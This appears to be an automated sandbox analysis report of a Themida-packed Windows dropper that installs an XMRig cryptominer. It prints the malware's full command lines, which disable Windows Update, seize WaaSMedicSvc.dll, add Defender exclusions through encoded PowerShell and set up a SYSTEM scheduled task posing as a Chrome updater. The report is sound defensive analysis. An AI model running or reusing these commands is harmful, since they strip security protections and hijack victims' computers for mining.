Analysis

  • max time kernel
    302s
  • max time network
    255s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • resource tags

    arch:x64arch:x86image:win10-20220414-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16-07-2022 22:15

General

  • Target

    fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462.exe

  • Size

    7.4MB

  • MD5

    40f9273f06567da762a787c34937dc08

  • SHA1

    2e811bb5047a0e7c07c48e037a540f30c301b0ab

  • SHA256

    fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462

  • SHA512

    f3c0e58f4a2e11482f00f0c3bb583dce48eda4f04dfd118323a2b3e2c44999d891cbc4474203046f262b39bca05ade0e58231dcbcfe1df589f9b4875a4804dfd

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462.exe
    "C:\Users\Admin\AppData\Local\Temp\fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3036
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbwBxAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBvAGMAdwAjAD4A"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4000
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4060
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:2700
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1524
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1636
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:2892
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:2180
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2624
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:3892
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:2420
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:2852
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:2180
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1832
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
            5⤵
              PID:4524
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
              5⤵
                PID:4588
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                5⤵
                  PID:4560
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:4496
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                    5⤵
                      PID:4476
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      5⤵
                        PID:4448
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                        5⤵
                          PID:4408
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4384
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4364
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4340
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                          5⤵
                          • Modifies registry key
                          PID:4316
                        • C:\Windows\system32\sc.exe
                          sc stop UsoSvc
                          5⤵
                          • Launches sc.exe
                          PID:1484
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1016
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1304
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:928
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1780
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:952
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBqAGsAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBVAEEAZQBnAEIAcwBBAEcAawBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAFIAdwBCAHYAQQBHADgAQQBaAHcAQgBzAEEARwBVAEEAWABBAEIARABBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBaAFEAQgBjAEEASABVAEEAYwBBAEIAawBBAEcARQBBAGQAQQBCAGwAQQBIAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEwAUQBCAFcAQQBHAFUAQQBjAGcAQgBpAEEAQwBBAEEAVQBnAEIAMQBBAEcANABBAFEAUQBCAHoAQQBDAEEAQQBQAEEAQQBqAEEARwBNAEEAYwBBAEEAagBBAEQANABBACIAJwApACAAPAAjAGEAYwAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHAAYgBjAHoAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB3AHcAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB1AGsAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBrAHoAZgBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwB4AHoAYgB6ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
                        4⤵
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1128
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                    2⤵
                    • Checks computer location settings
                    PID:1348
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                    2⤵
                    • Drops startup file
                    PID:2976
                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                  1⤵
                  • Drops file in Windows directory
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:3864
                • C:\Windows\system32\browser_broker.exe
                  C:\Windows\system32\browser_broker.exe -Embedding
                  1⤵
                  • Modifies Internet Explorer settings
                  PID:3460
                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                  1⤵
                  • Modifies registry class
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:3976
                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                  1⤵
                  • Drops file in Windows directory
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1936
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGUAegBsAGkAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGMAcAAjAD4A"
                  1⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4516
                  • C:\Program Files\Google\Chrome\updater.exe
                    "C:\Program Files\Google\Chrome\updater.exe"
                    2⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:4880
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                      3⤵
                      • Drops file in Drivers directory
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4936
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbwBxAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBvAGMAdwAjAD4A"
                        4⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5044
                      • C:\Windows\System32\conhost.exe
                        C:\Windows\System32\conhost.exe "yhxnbfvc"
                        4⤵
                          PID:2268
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe vjvqraunhphpcxx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8Tp0/SG7shKeBfov0SpkJ+htBtlrCxwKrT2FTk8hoaLe
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4764
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          4⤵
                            PID:4604
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            4⤵
                              PID:4628
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -hibernate-timeout-ac 0
                        1⤵
                          PID:5032
                        • C:\Windows\system32\icacls.exe
                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                          1⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:4504
                        • C:\Windows\system32\takeown.exe
                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                          1⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:2272
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          1⤵
                            PID:2208
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            1⤵
                              PID:4796
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                              1⤵
                                PID:4824
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                1⤵
                                  PID:4652
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                  1⤵
                                    PID:4608
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    1⤵
                                      PID:2664
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                      1⤵
                                        PID:1784
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:60
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4280
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:2188
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:1932
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4500
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4488
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4460
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4472
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4440
                                      • C:\Windows\system32\sc.exe
                                        sc stop dosvc
                                        1⤵
                                        • Launches sc.exe
                                        PID:4412
                                      • C:\Windows\system32\powercfg.exe
                                        powercfg /x -standby-timeout-dc 0
                                        1⤵
                                          PID:4400
                                        • C:\Windows\system32\sc.exe
                                          sc stop bits
                                          1⤵
                                          • Launches sc.exe
                                          PID:4340
                                        • C:\Windows\system32\sc.exe
                                          sc stop wuauserv
                                          1⤵
                                          • Launches sc.exe
                                          PID:4344
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -standby-timeout-ac 0
                                          1⤵
                                            PID:4316
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-dc 0
                                            1⤵
                                              PID:5052
                                            • C:\Windows\system32\sc.exe
                                              sc stop WaaSMedicSvc
                                              1⤵
                                              • Launches sc.exe
                                              PID:5104
                                            • C:\Windows\system32\sc.exe
                                              sc stop UsoSvc
                                              1⤵
                                              • Launches sc.exe
                                              PID:5000
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                                PID:5084
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                  PID:4696
                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                  1⤵
                                                  • Modifies registry class
                                                  PID:1048

